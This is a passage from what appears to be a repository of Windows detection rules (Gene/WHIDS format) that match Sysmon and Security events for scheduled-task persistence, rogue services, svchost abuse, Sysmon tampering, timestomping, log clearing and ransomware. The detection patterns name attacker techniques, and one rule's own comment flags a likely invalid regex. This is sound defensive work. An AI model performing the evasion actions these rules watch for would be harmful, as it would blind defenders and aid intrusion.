Criticality may have to be adjusted.", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$im: Image ~= '(?i:^c:\\\\windows\\\\sys(wow64|tem32)\\\\rundll32.exe$)'", 27 | "$pgfiles: ImageLoaded ~= '(?i:^C:\\\\(PROGRA~2|Program Files.*?)\\\\)'", 28 | "$windows: ImageLoaded ~= '(?i:^C:\\\\Windows\\\\)'" 29 | ], 30 | "Condition": "$im and !($pgfiles or $windows)" 31 | } 32 | 33 | -------------------------------------------------------------------------------- /rules/schedtasks.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NewScheduledTask", 3 | "Tags": [ 4 | "ScheduledTasks" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 4, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1053", 17 | "Tactic": "privilege-escalation", 18 | "Reference": "https://attack.mitre.org/techniques/T1053" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comment": "Experimental rule to catch local scheduled task creation (schtasks /create or /xml without the /S remote-host switch)", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$schtasks: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\schtasks\\.exe$)'", 27 | "$create: CommandLine ~= '(?i:/(xml|create))'", 28 | "$remote: CommandLine ~= '(?i:/S )'" 29 | ], 30 | "Condition": "$schtasks and !$remote and $create" 31 | } 32 | 33 | { 34 | "Name": "RunningScheduledTask", 35 | "Tags": [ 36 | "ScheduledTasks" 37 | ], 38 | "Meta": { 39 | "Events": { 40 | "Microsoft-Windows-Sysmon/Operational": [ 41 | 1 42 | ] 43 | }, 44 | "Computers": [], 45 | "Criticality": 3, 46 | "ATTACK": [ 47 | { 48 | "ID": "T1053", 49 | "Tactic": "privilege-escalation", 50 | "Reference": "https://attack.mitre.org/techniques/T1053" 51 | } 52 | ], 53 | "Author": "0xrawsec", 54 | "Comment": "Experimental rule to catch processes spawned directly by schtasks.exe (only the System32 copy is matched). Note: tasks executed by the Task Scheduler service are normally started by svchost.exe rather than schtasks.exe, so this rule does not see task execution itself", 55 | "Schema": "2.0.0" 56 | }, 57 | "Matches": [ 58 | "$schtasks: ParentImage ~= '(?i:^c:\\\\windows\\\\system32\\\\schtasks\\.exe$)'" 59 | ], 60 | 
"Condition": "$schtasks" 61 | } 62 | 63 | { 64 | "Name": "NewRemoteScheduledTask", 65 | "Tags": [ 66 | "ScheduledTasks", 67 | "Lateral" 68 | ], 69 | "Meta": { 70 | "Events": { 71 | "Microsoft-Windows-Sysmon/Operational": [ 72 | 1 73 | ] 74 | }, 75 | "Computers": [], 76 | "Criticality": 7, 77 | "ATTACK": [ 78 | { 79 | "ID": "T1053", 80 | "Tactic": "privilege-escalation", 81 | "Reference": "https://attack.mitre.org/techniques/T1053" 82 | } 83 | ], 84 | "Author": "0xrawsec", 85 | "Comment": "Experimental rule to catch remote scheduled tasks creation", 86 | "Schema": "2.0.0" 87 | }, 88 | "Matches": [ 89 | "$schtasks: Image ~= '(?i:^c:\\\\windows\\\\system32\\\\schtasks\\.exe$)'", 90 | "$create: CommandLine ~= '(?i:/(create|xml))'", 91 | "$remote: CommandLine ~= '(?i:/S )'" 92 | ], 93 | "Condition": "$schtasks and $remote and $create " 94 | } 95 | 96 | { 97 | "Name": "NewSchedTaskInReg", 98 | "Tags": [ 99 | "Registry", 100 | "Autorun", 101 | "ScheduledTasks" 102 | ], 103 | "Meta": { 104 | "Events": { 105 | "Microsoft-Windows-Sysmon/Operational": [ 106 | 13 107 | ] 108 | }, 109 | "Computers": [], 110 | "Criticality": 8, 111 | "ATTACK": [ 112 | { 113 | "ID": "T1053", 114 | "Tactic": "privilege-escalation", 115 | "Reference": "https://attack.mitre.org/techniques/T1053" 116 | } 117 | ], 118 | "Author": "@0xrawsec", 119 | "Comment": "Spot new scheduled task via new registry key", 120 | "Schema": "2.0.0" 121 | }, 122 | "Matches": [ 123 | "$eventtype: EventType = 'SetValue'", 124 | "$newid: TargetObject ~= '(?i:\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\.*?\\\\Id$)'" 125 | ], 126 | "Condition": "$eventtype and $newid" 127 | } 128 | 129 | { 130 | "Name": "NewSchedTaskOnDisk", 131 | "Tags": [ 132 | "ScheduledTasks" 133 | ], 134 | "Meta": { 135 | "Events": { 136 | "Microsoft-Windows-Sysmon/Operational": [ 137 | 11 138 | ] 139 | }, 140 | "Computers": [], 141 | "Criticality": 8, 142 | "ATTACK": [ 143 | { 144 | "ID": "T1053", 145 | 
"Tactic": "privilege-escalation", 146 | "Reference": "https://attack.mitre.org/techniques/T1053" 147 | } 148 | ], 149 | "Author": "0xrawsec", 150 | "Comments": "New scheduled task created on disk.", 151 | "Schema": "2.0.0" 152 | }, 153 | "Matches": [ 154 | "$target: TargetFilename ~= '(?i:^C:\\\\Windows\\\\Sys(tem32|wow64)\\\\Tasks\\\\)'" 155 | ], 156 | "Condition": "$target" 157 | } 158 | 159 | -------------------------------------------------------------------------------- /rules/services.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SuspiciousService", 3 | "Tags": [ 4 | "SvcHost", 5 | "ImageLoaded", 6 | "Sysmon" 7 | ], 8 | "Meta": { 9 | "Events": { 10 | "Microsoft-Windows-Sysmon/Operational": [ 11 | 1 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 4, 16 | "Author": "@0xrawsec", 17 | "Comment": "Tries to spot suspicious processes spawned by services.exe", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$parent: ParentImage ~= '(?i:C:\\\\Windows\\\\(System32|SysWOW64)\\\\services\\.exe)'", 22 | "$windows: Image ~= '(?i:C:\\\\Windows\\\\)'", 23 | "$programfile: Image ~= '(?i:C:\\\\(PROGRA~2|Program Files.*?)\\\\.*)'" 24 | ], 25 | "Condition": "$parent and !$windows and !$programfile" 26 | } 27 | 28 | { 29 | "Name": "SuspiciousServiceInstallation", 30 | "Tags": [ 31 | "Services", 32 | "Registry", 33 | "Autorun" 34 | ], 35 | "Meta": { 36 | "Events": { 37 | "Microsoft-Windows-Sysmon/Operational": [ 38 | 13 39 | ] 40 | }, 41 | "Computers": [], 42 | "Criticality": 8, 43 | "Author": "@0xrawsec", 44 | "Comment": "Tries to spot suspicious service installation", 45 | "Schema": "2.0.0" 46 | }, 47 | "Matches": [ 48 | "$eventtype: EventType = 'SetValue'", 49 | "$key1: TargetObject ~= '(?i:^HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\.*?\\\\ImagePath$)'", 50 | "$key2: TargetObject ~= '(?i:^HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\.*?\\\\Parameters\\\\ServiceDll$)'", 51 | "$systemroot: 
Details ~= '(?i:%%SystemRoot%%)'", 52 | "$service: Image ~= '(?i:C:\\\\Windows\\\\system32\\\\services.exe)'" 53 | ], 54 | "Condition": "$eventtype and ($key1 or $key2) and !($systemroot or $service)" 55 | } 56 | 57 | { 58 | "Name": "SuspiciousServiceCreated", 59 | "Tags": [ 60 | "Services" 61 | ], 62 | "Meta": { 63 | "Events": { 64 | "Microsoft-Windows-Sysmon/Operational": [ 65 | 1 66 | ] 67 | }, 68 | "Computers": [], 69 | "Criticality": 7, 70 | "Author": "@0xrawsec", 71 | "Comment": "Spot service creation via 'sc create' whose binPath does not point under C:\\Windows. NOTE(review): the $binpath regex starts with '?i:' instead of '(?i:', which does not look like a valid pattern, so the binPath exclusion is probably not applied - verify that the rule compiles. The '(?i:sc.exe$)' image match has no path separator and also matches other images ending in sc.exe (e.g. csc.exe).", 72 | "Schema": "2.0.0" 73 | }, 74 | "Matches": [ 75 | "$sc: Image ~= '(?i:sc.exe$)'", 76 | "$op: CommandLine ~= '(?i: (create) )'", 77 | "$binpath: CommandLine ~= '?i:(binPath=.*?C:\\\\Windows)'" 78 | ], 79 | "Condition": "$sc and $op and !$binpath" 80 | } 81 | 82 | { 83 | "Name": "ServiceDeletion", 84 | "Tags": [ 85 | "Services" 86 | ], 87 | "Meta": { 88 | "Events": { 89 | "Microsoft-Windows-Sysmon/Operational": [ 90 | 1 91 | ] 92 | }, 93 | "Computers": [], 94 | "Criticality": 3, 95 | "Author": "@0xrawsec", 96 | "Comment": "Spot service deletion via 'sc delete'", 97 | "Schema": "2.0.0" 98 | }, 99 | "Matches": [ 100 | "$sc: Image ~= '(?i:sc.exe$)'", 101 | "$op: CommandLine ~= '(?i: (delete) )'" 102 | ], 103 | "Condition": "$sc and $op" 104 | } 105 | 106 | -------------------------------------------------------------------------------- /rules/svchost.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SvcHostMimic", 3 | "Tags": [ 4 | "SvcHost", 5 | "Sysmon" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 1 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 7, 15 | "Author": "@0xrawsec", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$im: Image ~= '(?i:\\\\svchost)'", 20 | "$svchost: Image ~= '(?i:c:\\\\windows\\\\sys(tem32|wow64)\\\\svchost.exe$)'" 21 | ], 22 | "Condition": "$im and !$svchost" 23 | } 24 | 25 | { 26 | "Name": "SvcHostBadParent", 27 | "Tags": [ 
28 | "SvcHost", 29 | "Heuristics", 30 | "Sysmon" 31 | ], 32 | "Meta": { 33 | "Events": { 34 | "Microsoft-Windows-Sysmon/Operational": [ 35 | 1 36 | ] 37 | }, 38 | "Computers": [], 39 | "Criticality": 7, 40 | "Author": "@0xrawsec", 41 | "Comments": "Wrong svchost parent", 42 | "Schema": "2.0.0" 43 | }, 44 | "Matches": [ 45 | "$svchost: Image ~= '(?i:^c:\\\\windows\\\\sys(tem32|wow64)\\\\svchost\\.exe$)'", 46 | "$pservices: ParentImage ~= '(?i:^C:\\\\Windows\\\\sys(tem32|wow64)\\\\(services|svchost)\\.exe$)'" 47 | ], 48 | "Condition": "$svchost and !$pservices" 49 | } 50 | 51 | { 52 | "Name": "SvcHostImageLoaded", 53 | "Tags": [ 54 | "SvcHost", 55 | "ImageLoaded", 56 | "Sysmon" 57 | ], 58 | "Meta": { 59 | "Events": { 60 | "Microsoft-Windows-Sysmon/Operational": [ 61 | 7 62 | ] 63 | }, 64 | "Computers": [], 65 | "Criticality": 0, 66 | "Author": "@0xrawsec", 67 | "Comment": "Just an informational rule that can be further used to spot weird image loaded", 68 | "Disable": true, 69 | "Schema": "2.0.0" 70 | }, 71 | "Matches": [ 72 | "$im: Image ~= '(?i:C:\\\\Windows\\\\System32\\\\svchost\\.exe)'" 73 | ], 74 | "Condition": "$im" 75 | } 76 | 77 | { 78 | "Name": "SvcHostUnsignedDll", 79 | "Tags": [ 80 | "SvcHost", 81 | "ImageLoaded", 82 | "Sysmon" 83 | ], 84 | "Meta": { 85 | "Events": { 86 | "Microsoft-Windows-Sysmon/Operational": [ 87 | 7 88 | ] 89 | }, 90 | "Computers": [], 91 | "Criticality": 6, 92 | "Author": "@0xrawsec", 93 | "Comment": "Images loaded by svchost and not signed", 94 | "Schema": "2.0.0" 95 | }, 96 | "Matches": [ 97 | "$im: Image ~= '(?i:C:\\\\Windows\\\\System32\\\\svchost\\.exe)'", 98 | "$unsigned: Signed = 'false'" 99 | ], 100 | "Condition": "$im and $unsigned" 101 | } 102 | 103 | { 104 | "Name": "SvcHostUntrustedDLL", 105 | "Tags": [ 106 | "SvcHost", 107 | "ImageLoaded", 108 | "Sysmon" 109 | ], 110 | "Meta": { 111 | "Events": { 112 | "Microsoft-Windows-Sysmon/Operational": [ 113 | 7 114 | ] 115 | }, 116 | "Computers": [], 117 | "Criticality": 7, 118 | 
"Author": "@0xrawsec", 119 | "Comment": "Images loaded by svchost.exe whose Signature does not match the trusted-dll-sig list (i.e. not signed by Windows). Needs to be adjusted according to the environment.", 120 | "Schema": "2.0.0" 121 | }, 122 | "Matches": [ 123 | "$im: Image ~= '(?i:C:\\\\Windows\\\\System32\\\\svchost\\.exe)'", 124 | "$trusted: Signature ~= '{{trusted-dll-sig}}'" 125 | ], 126 | "Condition": "$im and !$trusted" 127 | } 128 | 129 | { 130 | "Name": "StopSvchostAccess", 131 | "Tags": [ 132 | "Invoke-Phant0m", 133 | "SvcHost" 134 | ], 135 | "Meta": { 136 | "Events": { 137 | "Microsoft-Windows-Sysmon/Operational": [ 138 | 10 139 | ] 140 | }, 141 | "Computers": [], 142 | "Criticality": 7, 143 | "Comments": "Process access to svchost.exe with PROCESS_SUSPEND_RESUME (0x0800) or PROCESS_TERMINATE (0x0001) in GrantedAccess, from a source not in the AV/Sysmon/system/WmiPrvSE whitelist. Covers event-log thread killing tools such as Invoke-Phant0m", 144 | "Author": "0xrawsec", 145 | "Schema": "2.0.0" 146 | }, 147 | "Matches": [ 148 | "$svchost: TargetImage ~= '{{bin-svchost}}'", 149 | "$wl: SourceImage ~= '({{bin-av}}|{{bin-sysmon}}|{{bin-system-nr}}|{{bin-wmiprvse}})'", 150 | "$stopresume: GrantedAccess &= '0x0800'", 151 | "$terminate: GrantedAccess &= '0x0001'" 152 | ], 153 | "Condition": "$svchost and ($stopresume or $terminate) and !$wl" 154 | } 155 | 156 | { 157 | "Name": "MaliciousSvchostAccess", 158 | "Tags": [ 159 | "Invoke-Phant0m", 160 | "SvcHost" 161 | ], 162 | "Meta": { 163 | "Events": { 164 | "Microsoft-Windows-Sysmon/Operational": [ 165 | 10 166 | ] 167 | }, 168 | "Computers": [], 169 | "Criticality": 10, 170 | "Comments": "Process access to svchost.exe with an UNKNOWN frame in the CallTrace (code not backed by a module on disk, as produced by Invoke-Phant0m)", 171 | "Author": "0xrawsec", 172 | "Schema": "2.0.0" 173 | }, 174 | "Matches": [ 175 | "$ct: CallTrace ~= 'UNKNOWN'", 176 | "$svchost: TargetImage ~= '(?i:windows\\\\sys(tem32|wow64)\\\\svchost\\.exe$)'" 177 | ], 178 | "Condition": "$svchost and $ct" 179 | } 180 | 181 | { 182 | "Name": "SvcHostSuspiciousNetConn", 183 | "Tags": [ 184 | "SvcHost" 185 | ], 186 | "Meta": { 187 | "Events": { 188 | "Microsoft-Windows-Sysmon/Operational": [ 189 | 3 190 | ] 191 | }, 192 | "Computers": [], 193 | "Criticality": 6, 194 | 
"Comments": "Outbound svchost.exe connections, excluding multicast/localhost destinations, DHCP (bootpc to bootps) and LDAP/NTP/DNS/RPC endpoint mapper traffic to private IPs. Disabled because of false positives", 195 | "Author": "0xrawsec", 196 | "Disable": true, 197 | "Schema": "2.0.0" 198 | }, 199 | "Matches": [ 200 | "$svchost: Image ~= '(?i:windows\\\\sys(wow64|tem32)\\\\svchost\\.exe$)'", 201 | "$dstbootps: DestinationPortName = 'bootps'", 202 | "$dstldap: DestinationPortName = 'ldap'", 203 | "$dstntp: DestinationPortName = 'ntp'", 204 | "$dstdomain: DestinationPortName = 'domain'", 205 | "$dstepmap: DestinationPortName = 'epmap'", 206 | "$srcbootpc: SourcePortName = 'bootpc'", 207 | "$dstmulticast: DestinationIp ~= '(?i:^(224|23(2|3|4)|239\\.))'", 208 | "$dstlocalhost: DestinationIp = '127.0.0.1'", 209 | "$dstprivip: DestinationIp ~= '{{priv-ipv4}}'", 210 | "$init: Initiated = 'true'" 211 | ], 212 | "Condition": "$svchost and $init and !($dstmulticast or $dstlocalhost) and !($srcbootpc and $dstbootps) and !(($dstldap or $dstntp or $dstdomain or $dstepmap) and $dstprivip)" 213 | } 214 | 215 | -------------------------------------------------------------------------------- /rules/sysmon.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SysmonStateChanged", 3 | "Tags": [ 4 | "Sysmon" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 4 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "Author": "@0xrawsec", 15 | "Comment": "Sysmon service state change (EID 4) whose State is not 'Started', typically Sysmon being stopped", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$start: State = 'Started'" 20 | ], 21 | "Condition": "!$start" 22 | } 23 | 24 | { 25 | "Name": "SysmonConfigChanged", 26 | "Tags": [ 27 | "Sysmon" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-Sysmon/Operational": [ 32 | 16 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 8, 37 | "Author": "@0xrawsec", 38 | "Comment": "Any Sysmon configuration change event (EID 16), regardless of the new configuration", 39 | "Schema": "2.0.0" 40 | }, 41 | "Matches": [], 42 | "Condition": "" 43 | } 44 | 45 | { 46 | "Name": "SysmonFingerprinting", 47 | "Tags": [ 48 | "Sysmon" 49 | ], 50 | "Meta": { 51 | "Events": { 52 | 
"Microsoft-Windows-Sysmon/Operational": [ 53 | 1 54 | ] 55 | }, 56 | "Computers": [], 57 | "Criticality": 6, 58 | "Author": "@0xrawsec", 59 | "Comment": "Experimental rules to catch Sysmon configuration enumeration via Sysmon executable", 60 | "Schema": "2.0.0" 61 | }, 62 | "Matches": [ 63 | "$sysmon: Product = 'Sysinternals Sysmon'", 64 | "$sysmonim: Image ~= '(?i:C:\\\\Windows\\\\.*sysmon.*)'", 65 | "$arg: CommandLine ~= '(?i:\\s-c\\s*$)'" 66 | ], 67 | "Condition": "($sysmon or $sysmonim) and $arg" 68 | } 69 | 70 | { 71 | "Name": "SysmonRegFingerprinting", 72 | "Tags": [ 73 | "Sysmon" 74 | ], 75 | "Meta": { 76 | "Events": { 77 | "Microsoft-Windows-Sysmon/Operational": [ 78 | 12 79 | ] 80 | }, 81 | "Computers": [], 82 | "Criticality": 7, 83 | "Author": "@0xrawsec", 84 | "Comment": "Experimental rule to catch sysmon config fingerprinting in registry by another process than sysmon itself", 85 | "Schema": "2.0.0" 86 | }, 87 | "Matches": [ 88 | "$create: EventType = 'CreateKey'", 89 | "$sysmon: Image ~= '(?i:C:\\\\Windows\\\\Sysmon.exe)'", 90 | "$target: TargetObject ~= '(?i:^HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\SysmonDrv\\\\Parameters)'" 91 | ], 92 | "Condition": "$target and $create and !$sysmon" 93 | } 94 | 95 | { 96 | "Name": "SysmonConfigTampering", 97 | "Tags": [ 98 | "Sysmon" 99 | ], 100 | "Meta": { 101 | "Events": { 102 | "Microsoft-Windows-Sysmon/Operational": [ 103 | 12, 104 | 13 105 | ] 106 | }, 107 | "Computers": [], 108 | "Criticality": 10, 109 | "Author": "@0xrawsec", 110 | "Comment": "Experimental rule to catch sysmon config tampering by another process than sysmon itself ", 111 | "Schema": "2.0.0" 112 | }, 113 | "Matches": [ 114 | "$set: EventType = 'SetValue'", 115 | "$del: EventType = 'DeleteValue'", 116 | "$sysmon: Image ~= '(?i:C:\\\\Windows\\\\Sysmon.exe)'", 117 | "$target: TargetObject ~= '(?i:HKLM\\\\System\\\\CurrentControlSet\\\\services\\\\SysmonDrv\\\\Parameters\\\\(Options|HashingAlgorithm|Rules))'" 118 | ], 119 | "Condition": 
"$target and ($set or $del) and !$sysmon" 120 | } 121 | 122 | -------------------------------------------------------------------------------- /rules/timestomp.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ExecTimestomping", 3 | "Tags": [ 4 | "Timestomp" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 2 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 6, 14 | "Author": "@0xrawsec", 15 | "Comment": "", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$exec: TargetFilename ~= '(?i:({{script-exts}}|{{exec-exts}}))'", 20 | "$wl1: TargetFilename ~= '(?i:^C:\\\\Users\\\\.*?\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Recent\\\\CustomDestinations)\\\\[A-Z0-9]{20}.temp$'", 21 | "$wl2: TargetFilename ~= '(?i:.*~tmp$)'", 22 | "$wl3: TargetFilename ~= '(?i:C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\)'" 23 | ], 24 | "Condition": "$exec and !($wl1 or $wl2 or $wl3)" 25 | } 26 | 27 | -------------------------------------------------------------------------------- /rules/tools.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "SystemInfo.exe", 3 | "Tags": [ 4 | "Tool" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 2, 14 | "Author": "0xrawsec", 15 | "Comment": "SystemInfo execution", 16 | "Schema": "2.0.0" 17 | }, 18 | "Matches": [ 19 | "$exe: Image ~= '(?i:\\\\systeminfo\\.exe$)'" 20 | ], 21 | "Condition": "$exe" 22 | } 23 | 24 | { 25 | "Name": "Tasklist.exe", 26 | "Tags": [ 27 | "Tool" 28 | ], 29 | "Meta": { 30 | "Events": { 31 | "Microsoft-Windows-Sysmon/Operational": [ 32 | 1 33 | ] 34 | }, 35 | "Computers": [], 36 | "Criticality": 2, 37 | "Author": "0xrawsec", 38 | "Comment": "Tasklist execution", 39 | "Schema": "2.0.0" 40 | }, 41 | "Matches": [ 42 | "$exe: Image ~= '(?i:\\\\tasklist\\.exe$)'" 43 | ], 
44 | "Condition": "$exe" 45 | } 46 | 47 | { 48 | "Name": "Xcopy.exe", 49 | "Tags": [ 50 | "Tool" 51 | ], 52 | "Meta": { 53 | "Events": { 54 | "Microsoft-Windows-Sysmon/Operational": [ 55 | 1 56 | ] 57 | }, 58 | "Computers": [], 59 | "Criticality": 2, 60 | "Author": "0xrawsec", 61 | "Comment": "xcopy execution", 62 | "Schema": "2.0.0" 63 | }, 64 | "Matches": [ 65 | "$exe: Image ~= '(?i:\\\\xcopy\\.exe$)'" 66 | ], 67 | "Condition": "$exe" 68 | } 69 | 70 | { 71 | "Name": "Net.exe", 72 | "Tags": [ 73 | "Tool" 74 | ], 75 | "Meta": { 76 | "Events": { 77 | "Microsoft-Windows-Sysmon/Operational": [ 78 | 1 79 | ] 80 | }, 81 | "Computers": [], 82 | "Criticality": 2, 83 | "Author": "0xrawsec", 84 | "Comment": "net.exe execution", 85 | "Schema": "2.0.0" 86 | }, 87 | "Matches": [ 88 | "$exe: Image ~= '(?i:\\\\net1?\\.exe$)'" 89 | ], 90 | "Condition": "$exe" 91 | } 92 | 93 | { 94 | "Name": "Taskkill.exe", 95 | "Tags": [ 96 | "Tool" 97 | ], 98 | "Meta": { 99 | "Events": { 100 | "Microsoft-Windows-Sysmon/Operational": [ 101 | 1 102 | ] 103 | }, 104 | "Computers": [], 105 | "Criticality": 2, 106 | "Author": "0xrawsec", 107 | "Comment": "taskkill.exe execution", 108 | "Schema": "2.0.0" 109 | }, 110 | "Matches": [ 111 | "$exe: Image ~= '(?i:\\\\taskkill\\.exe$)'" 112 | ], 113 | "Condition": "$exe" 114 | } 115 | 116 | { 117 | "Name": "Reg.exe", 118 | "Tags": [ 119 | "Tool" 120 | ], 121 | "Meta": { 122 | "Events": { 123 | "Microsoft-Windows-Sysmon/Operational": [ 124 | 1 125 | ] 126 | }, 127 | "Computers": [], 128 | "Criticality": 2, 129 | "Author": "0xrawsec", 130 | "Comment": "reg.exe execution", 131 | "Schema": "2.0.0" 132 | }, 133 | "Matches": [ 134 | "$exe: Image ~= '(?i:\\\\reg\\.exe$)'" 135 | ], 136 | "Condition": "$exe" 137 | } 138 | 139 | { 140 | "Name": "Ping.exe", 141 | "Tags": [ 142 | "Tool" 143 | ], 144 | "Meta": { 145 | "Events": { 146 | "Microsoft-Windows-Sysmon/Operational": [ 147 | 1 148 | ] 149 | }, 150 | "Computers": [], 151 | "Criticality": 2, 152 | "Author": 
"0xrawsec", 153 | "Comment": "ping.exe execution", 154 | "Schema": "2.0.0" 155 | }, 156 | "Matches": [ 157 | "$exe: Image ~= '(?i:\\\\ping\\.exe$)'" 158 | ], 159 | "Condition": "$exe" 160 | } 161 | 162 | { 163 | "Name": "Nbtstat.exe", 164 | "Tags": [ 165 | "Tool" 166 | ], 167 | "Meta": { 168 | "Events": { 169 | "Microsoft-Windows-Sysmon/Operational": [ 170 | 1 171 | ] 172 | }, 173 | "Computers": [], 174 | "Criticality": 2, 175 | "Author": "0xrawsec", 176 | "Comment": "Nbtstat.exe execution", 177 | "Schema": "2.0.0" 178 | }, 179 | "Matches": [ 180 | "$exe: Image ~= '(?i:\\\\nbtstat\\.exe$)'" 181 | ], 182 | "Condition": "$exe" 183 | } 184 | 185 | -------------------------------------------------------------------------------- /rules/wevtutil.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "EventClearing", 3 | "Tags": [ 4 | "PostExploit" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1070", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1070" 19 | } 20 | ], 21 | "Author": "@0xrawsec", 22 | "Schema": "2.0.0" 23 | }, 24 | "Matches": [ 25 | "$im: Image ~= '(?i:\\\\wevtutil\\.exe$)'", 26 | "$cmd: CommandLine ~= '(?i: cl | clear-log )'" 27 | ], 28 | "Condition": "$im and $cmd" 29 | } 30 | 31 | { 32 | "Name": "SecurityLogClearing", 33 | "Tags": [ 34 | "PostExploit" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Security": [ 39 | 1102 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "ATTACK": [ 45 | { 46 | "ID": "T1070", 47 | "Tactic": "defense-evasion", 48 | "Reference": "https://attack.mitre.org/techniques/T1070" 49 | } 50 | ], 51 | "Author": "@0xrawsec", 52 | "Comments": "Catch Security logs clearing event", 53 | "Schema": "2.0.0" 54 | }, 55 | "Matches": [], 56 | "Condition": "" 57 | } 58 | 59 | 
-------------------------------------------------------------------------------- /rules/whids/README.md: -------------------------------------------------------------------------------- 1 | All the files in here will work only with WHIDS with enrichment (through hooks) being done on the events -------------------------------------------------------------------------------- /rules/whids/cryptolocker.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Cryptolocker", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 11 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "Author": "0xrawsec", 15 | "Comments": "Experimental rule to catch, kill and blacklist a generic cryptolocker", 16 | "Disable": true, 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$allowed: Image ~= '{{system}}'", 21 | "$empty_ext: Extension = ''", 22 | "$count_by_ext: CountByExt >= '50'" 23 | ], 24 | "Condition": "!$empty_ext and $count_by_ext", 25 | "Actions": [ 26 | "kill", 27 | "blacklist" 28 | ] 29 | } -------------------------------------------------------------------------------- /rules/whids/heuristics.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HeurMaliciousAccess", 3 | "Tags": [ 4 | "Heuristics", 5 | "WHIDS" 6 | ], 7 | "Meta": { 8 | "Events": { 9 | "Microsoft-Windows-Sysmon/Operational": [ 10 | 10 11 | ] 12 | }, 13 | "Computers": [], 14 | "Criticality": 8, 15 | "Author": "0xrawsec", 16 | "Comments": "Experimental rule to catch malicious accesses to Windows binaries. 
This works only with WHIDS and hooks enabled.", 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$ct: CallTrace ~= 'UNKNOWN'", 21 | "$whitelist: SourceImage ~= '(?i:{{system}}(sdiagnhost|svchost)\\.exe)'", 22 | "$windows: TargetImage ~= '(?i:C:\\\\Windows\\\\)'", 23 | "$write: GrantedAccess &= '0x20'", 24 | "$read: GrantedAccess &= '0x10'", 25 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid" 26 | ], 27 | "Condition": "!$srcisparent and $windows and $ct and ($write or $read) and !$whitelist" 28 | } 29 | 30 | { 31 | "Name": "HeurPersistentRAT", 32 | "Tags": [ 33 | "Heuristics", 34 | "WHIDS" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 1 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "Author": "@0xrawsec", 45 | "Comments": "Experimental rule to detect some persistent RATs (i.e. interesting tools to monitor being called and not being a descendant process from Explorer.exe, typical of an interactive session)", 46 | "Schema": "2.0.0" 47 | }, 48 | "Matches": [ 49 | "$exist: Ancestors ~= '(?i:^System\\|)'", 50 | "$anc: Ancestors ~= '(?i:C:\\\\Windows\\\\explorer\\.exe)'", 51 | "$schedsvc: ParentServices ~= '^(Schedule|BrokerInfrastructure,DcomLaunch,Power,SystemEventsBroker)$'", 52 | "$tools: Image ~= '{{admintools}}'" 53 | ], 54 | "Condition": "$exist and $tools and !$anc and !$schedsvc" 55 | } 56 | 57 | { 58 | "Name": "HeurOfficeThreat", 59 | "Tags": [ 60 | "Heuristics", 61 | "WHIDS", 62 | "MSOffice" 63 | ], 64 | "Meta": { 65 | "Events": { 66 | "Microsoft-Windows-Sysmon/Operational": [ 67 | 1 68 | ] 69 | }, 70 | "Computers": [], 71 | "Criticality": 10, 72 | "Author": "@0xrawsec", 73 | "Comments": "Generic rule to catch MS Office based malware", 74 | "Schema": "2.0.0" 75 | }, 76 | "Matches": [ 77 | 